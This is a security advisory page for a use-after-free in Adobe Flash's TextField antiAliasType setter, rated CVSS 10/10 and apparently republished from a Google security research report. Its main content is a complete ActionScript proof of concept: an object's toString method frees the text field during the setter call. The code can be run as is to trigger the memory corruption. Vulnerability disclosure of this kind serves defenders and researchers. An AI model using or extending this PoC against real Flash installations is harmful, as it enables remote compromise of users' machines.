Adobe Flash TextField.antiAliasType Setter Use-After-Free

2015.12.18
Risk: High
Local: No
Remote: Yes
CWE: N/A


CVSS Base Score: 10/10
Impact Subscore: 10/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

There is a use-after-free in the TextField antiAliasType setter. If it is set to an object with a toString method that frees the TextField, the property will be written after it is freed. A PoC is as follows: var toptf = this.createEmptyMovieClip("toptf", 1); function func(){ toptf.removeMovieClip(); trace("here"); return "advanced"; } var o = {toString : func}; var my_format:TextFormat = new TextFormat(); my_format.font = "Times-12"; var my_text1:TextField = toptf.createTextField("my_text1", toptf.getNextHighestDepth(), 9.5, 10, 400, 100); my_text1.text = "this.gridFitType = none"; my_text1.embedFonts = true; my_text1.antiAliasType = o; my_text1.gridFitType = "none"; my_text1.setTextFormat(my_format); var my_text2:TextField = toptf.createTextField("my_text2", toptf.getNextHighestDepth(), 9.5, 40, 400, 100); my_text2.text = "this.gridFitType = advanced"; my_text2.embedFonts = true; my_text2.antiAliasType = "advanced"; my_text2.gridFitType = "pixel"; my_text2.setTextFormat(my_format); var my_text3:TextField = toptf.createTextField("my_text3", toptf.getNextHighestDepth(), 9.5, 70, 400, 100); my_text3.text = "this.gridFitType = subpixel"; my_text3.embedFonts = true; my_text3.antiAliasType = "advanced"; my_text3.gridFitType = "subpixel"; my_text3.setTextFormat(my_format); A sample fla and swf are attached here https://code.google.com/p/google-security-research/issues/detail?id=560

References:

https://code.google.com/p/google-security-research/issues/detail?id=560


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top